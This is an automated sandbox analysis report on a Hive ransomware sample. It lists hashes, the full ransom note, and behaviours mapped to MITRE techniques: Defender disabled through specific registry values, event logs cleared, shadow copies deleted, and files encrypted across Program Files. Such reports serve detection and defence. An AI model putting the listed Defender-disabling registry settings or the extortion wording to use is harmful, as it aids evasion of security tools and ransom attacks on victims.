hive | af9e8f301a3677b457345921d7ee765a842eceb7df107714eaffc6193bfc6bbe

Resubmissions

12-02-2024 06:38

240212-hd166sgg25 10

12-02-2024 06:21

240212-g4tdksgd86 7

Analysis

max time kernel
268s
max time network
255s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
12-02-2024 06:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

zi1ysv64h.exe
Size

3.3MB
MD5

5384c6825a5707241c11d78529dbbfee
SHA1

85f5587e8ad534c2e5de0e72450b61ebda93e4fd
SHA256

3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21
SHA512

856861295efb9c1b0000b369297cf6905a277c2d7dd0bc238f3884cd22598055450bf0459d68441f135bb77150685a86707ea9320a37e10548b40185f09b961f
SSDEEP

49152:HJ9mQ5uetkErb/TKvO90dL3BmAFd4A64nsfJ+9NRUMZXuPH9fc0KHPKG/g+eNgiz:HJ9jkl9NbBo9fc0KHYno

Score

10^/10

hive evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\Program Files\Common Files\DESIGNER\K8zJ_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at you will need to purchase our decryption software. Please contact our sales department at: Login: Password: To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.2o4xo files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Processes:

MpCmdRun.exe

pid process

4452 MpCmdRun.exe
Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive

pid	process
4452	MpCmdRun.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

3772 wevtutil.exe
3340 wevtutil.exe
5036 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2228 bcdedit.exe
3704 bcdedit.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

pid	process
3772	wevtutil.exe
3340	wevtutil.exe
5036	wevtutil.exe

pid	process
2228	bcdedit.exe
3704	bcdedit.exe

Drops file in Program Files directory 64 IoCs

Processes:

zi1ysv64h.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\powerpointmui.msi.16.en-us.boot.tree.dat.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_EMS_HSC4koA0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-36_altform-unplated_contrast-black.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\drunk.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40_altform-unplated.png	zi1ysv64h.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\K8zJ_HOW_TO_DECRYPT.txt	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedMedTile.scale-200_contrast-black.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\sa_60x42.png	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_y3GhFSwWaWc0.2o4xo	zi1ysv64h.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f4\K8zJ_HOW_TO_DECRYPT.txt	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GOTHICBI.TTF.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_T8F5UzNTdTI0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Audio\Skype_Call_Connecting.m4a	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-white_targetsize-30.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashSquareTile.scale-100_contrast-black.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\XboxApp.Resource\Xbox.Smartglass.Loc.xml	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_713yhAMFNf00.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\ui-strings.js.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_aI-ryi8lNzE0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-pl.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_mTAlKpX2K100.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\ui-strings.js.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_Ri9aWMBnpgQ0.2o4xo	zi1ysv64h.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\K8zJ_HOW_TO_DECRYPT.txt	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019DemoR_BypassTrial180-ppd.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_ne8jSPg4d6A0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_M4CmfqKR4540.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-60_contrast-black.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarSmallTile.scale-400.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Grace-ppd.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_J9s-qCDaRkM0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-bridge-office.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_LiTZu90oPq00.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\PhotosApp\Assets\ThirdPartyNotices\ThirdPartyNotices.html	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-125_contrast-white.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-32_altform-unplated.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ye_60x42.png	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\edit-pdf-2x.png.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_Z1NVAGRaBN00.2o4xo	zi1ysv64h.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\K8zJ_HOW_TO_DECRYPT.txt	zi1ysv64h.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightItalic.ttf.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_FCr3XS22j9Q0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_F0QN2wBT08A0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-ppd.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_z2NA9wuzv5s0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\AFTRNOON.INF.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_RQ4QiPHhInk0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_YOTHbnVr7PQ0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_RtABN67bpG40.2o4xo	zi1ysv64h.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\K8zJ_HOW_TO_DECRYPT.txt	zi1ysv64h.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_yyupuoKPwvI0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_o3Bt5SRlzvw0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ppd.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_CPWQZ0sELkU0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\28.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\mail.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsWideTile.scale-200.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover_2x.png.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_zZ89ajkHl-M0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\2494_24x24x32.png	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_FOPox1gHYOA0.2o4xo	zi1ysv64h.exe
File created	C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\K8zJ_HOW_TO_DECRYPT.txt	zi1ysv64h.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_sxrvloUdXJE0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_UeHA5v5SFEw0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Rectangle_icon.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Themes\beach.mobile.jpg	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNotePageLargeTile.scale-150.png	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_Yl1A6B6Ez7E0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\es-ES\InputPersonalization.exe.mui	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\StarClubTile.Small_.jpg	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp6.scale-125.png	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\ui-strings.js.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_e_d01M9eg1w0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageProviderFunctions.psm1.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_UainiGVAiiU0.2o4xo	zi1ysv64h.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\WideTile.scale-125.png	zi1ysv64h.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Trial-pl.xrm-ms.AqGygcZcpW1wNjhoeRFMIyr_tYeaKs4cr41svz_2NAr_pQusvgYVdwE0.2o4xo	zi1ysv64h.exe

Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

804 sc.exe
2192 sc.exe
860 sc.exe
2612 sc.exe
5076 sc.exe
4912 sc.exe
4504 sc.exe
4632 sc.exe
4148 sc.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2236 vssadmin.exe

pid	process
804	sc.exe
2192	sc.exe
860	sc.exe
2612	sc.exe
5076	sc.exe
4912	sc.exe
4504	sc.exe
4632	sc.exe
4148	sc.exe

pid	process
2236	vssadmin.exe

Modifies registry class 3 IoCs

Processes:

reg.exeConhost.exereg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	Conhost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

4056 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

756 PING.EXE

pid	process
4056	notepad.exe

pid	process
756	PING.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exezi1ysv64h.exe

pid	process
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
3920	zi1ysv64h.exe
3920	zi1ysv64h.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exeConhost.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	3340	wevtutil.exe
Token: SeBackupPrivilege	3340	wevtutil.exe
Token: SeSecurityPrivilege	3772	wevtutil.exe
Token: SeBackupPrivilege	3772	wevtutil.exe
Token: SeSecurityPrivilege	5036	Conhost.exe
Token: SeBackupPrivilege	5036	Conhost.exe
Token: SeIncreaseQuotaPrivilege	1392	wmic.exe
Token: SeSecurityPrivilege	1392	wmic.exe
Token: SeTakeOwnershipPrivilege	1392	wmic.exe
Token: SeLoadDriverPrivilege	1392	wmic.exe
Token: SeSystemProfilePrivilege	1392	wmic.exe
Token: SeSystemtimePrivilege	1392	wmic.exe
Token: SeProfSingleProcessPrivilege	1392	wmic.exe
Token: SeIncBasePriorityPrivilege	1392	wmic.exe
Token: SeCreatePagefilePrivilege	1392	wmic.exe
Token: SeBackupPrivilege	1392	wmic.exe
Token: SeRestorePrivilege	1392	wmic.exe
Token: SeShutdownPrivilege	1392	wmic.exe
Token: SeDebugPrivilege	1392	wmic.exe
Token: SeSystemEnvironmentPrivilege	1392	wmic.exe
Token: SeRemoteShutdownPrivilege	1392	wmic.exe
Token: SeUndockPrivilege	1392	wmic.exe
Token: SeManageVolumePrivilege	1392	wmic.exe
Token: 33	1392	wmic.exe
Token: 34	1392	wmic.exe
Token: 35	1392	wmic.exe
Token: 36	1392	wmic.exe
Token: SeIncreaseQuotaPrivilege	4608	wmic.exe
Token: SeSecurityPrivilege	4608	wmic.exe
Token: SeTakeOwnershipPrivilege	4608	wmic.exe
Token: SeLoadDriverPrivilege	4608	wmic.exe
Token: SeSystemProfilePrivilege	4608	wmic.exe
Token: SeSystemtimePrivilege	4608	wmic.exe
Token: SeProfSingleProcessPrivilege	4608	wmic.exe
Token: SeIncBasePriorityPrivilege	4608	wmic.exe
Token: SeCreatePagefilePrivilege	4608	wmic.exe
Token: SeBackupPrivilege	4608	wmic.exe
Token: SeRestorePrivilege	4608	wmic.exe
Token: SeShutdownPrivilege	4608	wmic.exe
Token: SeDebugPrivilege	4608	wmic.exe
Token: SeSystemEnvironmentPrivilege	4608	wmic.exe
Token: SeRemoteShutdownPrivilege	4608	wmic.exe
Token: SeUndockPrivilege	4608	wmic.exe
Token: SeManageVolumePrivilege	4608	wmic.exe
Token: 33	4608	wmic.exe
Token: 34	4608	wmic.exe
Token: 35	4608	wmic.exe
Token: 36	4608	wmic.exe
Token: SeIncreaseQuotaPrivilege	4608	wmic.exe
Token: SeSecurityPrivilege	4608	wmic.exe
Token: SeTakeOwnershipPrivilege	4608	wmic.exe
Token: SeLoadDriverPrivilege	4608	wmic.exe
Token: SeSystemProfilePrivilege	4608	wmic.exe
Token: SeSystemtimePrivilege	4608	wmic.exe
Token: SeProfSingleProcessPrivilege	4608	wmic.exe
Token: SeIncBasePriorityPrivilege	4608	wmic.exe
Token: SeCreatePagefilePrivilege	4608	wmic.exe
Token: SeBackupPrivilege	4608	wmic.exe
Token: SeRestorePrivilege	4608	wmic.exe
Token: SeShutdownPrivilege	4608	wmic.exe
Token: SeDebugPrivilege	4608	wmic.exe
Token: SeSystemEnvironmentPrivilege	4608	wmic.exe
Token: SeRemoteShutdownPrivilege	4608	wmic.exe
Token: SeUndockPrivilege	4608	wmic.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

notepad.exe

pid process

4056 notepad.exe

pid	process
4056	notepad.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

zi1ysv64h.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3920 wrote to memory of 2936	3920	zi1ysv64h.exe	net.exe
PID 3920 wrote to memory of 2936	3920	zi1ysv64h.exe	net.exe
PID 2936 wrote to memory of 308	2936	net.exe	reg.exe
PID 2936 wrote to memory of 308	2936	net.exe	reg.exe
PID 3920 wrote to memory of 3952	3920	zi1ysv64h.exe	net.exe
PID 3920 wrote to memory of 3952	3920	zi1ysv64h.exe	net.exe
PID 3952 wrote to memory of 1068	3952	net.exe	net1.exe
PID 3952 wrote to memory of 1068	3952	net.exe	net1.exe
PID 3920 wrote to memory of 4412	3920	zi1ysv64h.exe	net.exe
PID 3920 wrote to memory of 4412	3920	zi1ysv64h.exe	net.exe
PID 4412 wrote to memory of 3484	4412	net.exe	net1.exe
PID 4412 wrote to memory of 3484	4412	net.exe	net1.exe
PID 3920 wrote to memory of 4584	3920	zi1ysv64h.exe	net.exe
PID 3920 wrote to memory of 4584	3920	zi1ysv64h.exe	net.exe
PID 4584 wrote to memory of 1948	4584	net.exe	net1.exe
PID 4584 wrote to memory of 1948	4584	net.exe	net1.exe
PID 3920 wrote to memory of 2628	3920	zi1ysv64h.exe	net.exe
PID 3920 wrote to memory of 2628	3920	zi1ysv64h.exe	net.exe
PID 2628 wrote to memory of 3596	2628	net.exe	net1.exe
PID 2628 wrote to memory of 3596	2628	net.exe	net1.exe
PID 3920 wrote to memory of 1832	3920	zi1ysv64h.exe	net.exe
PID 3920 wrote to memory of 1832	3920	zi1ysv64h.exe	net.exe
PID 1832 wrote to memory of 2900	1832	net.exe	net1.exe
PID 1832 wrote to memory of 2900	1832	net.exe	net1.exe
PID 3920 wrote to memory of 2864	3920	zi1ysv64h.exe	net.exe
PID 3920 wrote to memory of 2864	3920	zi1ysv64h.exe	net.exe
PID 2864 wrote to memory of 4992	2864	net.exe	net1.exe
PID 2864 wrote to memory of 4992	2864	net.exe	net1.exe
PID 3920 wrote to memory of 1116	3920	zi1ysv64h.exe	net.exe
PID 3920 wrote to memory of 1116	3920	zi1ysv64h.exe	net.exe
PID 1116 wrote to memory of 1416	1116	net.exe	reg.exe
PID 1116 wrote to memory of 1416	1116	net.exe	reg.exe
PID 3920 wrote to memory of 4776	3920	zi1ysv64h.exe	net.exe
PID 3920 wrote to memory of 4776	3920	zi1ysv64h.exe	net.exe
PID 4776 wrote to memory of 4680	4776	net.exe	net1.exe
PID 4776 wrote to memory of 4680	4776	net.exe	net1.exe
PID 3920 wrote to memory of 2612	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 2612	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 4148	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 4148	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 804	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 804	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 860	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 860	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 4632	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 4632	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 4504	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 4504	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 4912	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 4912	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 2192	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 2192	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 5076	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 5076	3920	zi1ysv64h.exe	sc.exe
PID 3920 wrote to memory of 1644	3920	zi1ysv64h.exe	reg.exe
PID 3920 wrote to memory of 1644	3920	zi1ysv64h.exe	reg.exe
PID 3920 wrote to memory of 3712	3920	zi1ysv64h.exe	reg.exe
PID 3920 wrote to memory of 3712	3920	zi1ysv64h.exe	reg.exe
PID 3920 wrote to memory of 1168	3920	zi1ysv64h.exe	reg.exe
PID 3920 wrote to memory of 1168	3920	zi1ysv64h.exe	reg.exe
PID 3920 wrote to memory of 2224	3920	zi1ysv64h.exe	reg.exe
PID 3920 wrote to memory of 2224	3920	zi1ysv64h.exe	reg.exe
PID 3920 wrote to memory of 4728	3920	zi1ysv64h.exe	reg.exe
PID 3920 wrote to memory of 4728	3920	zi1ysv64h.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
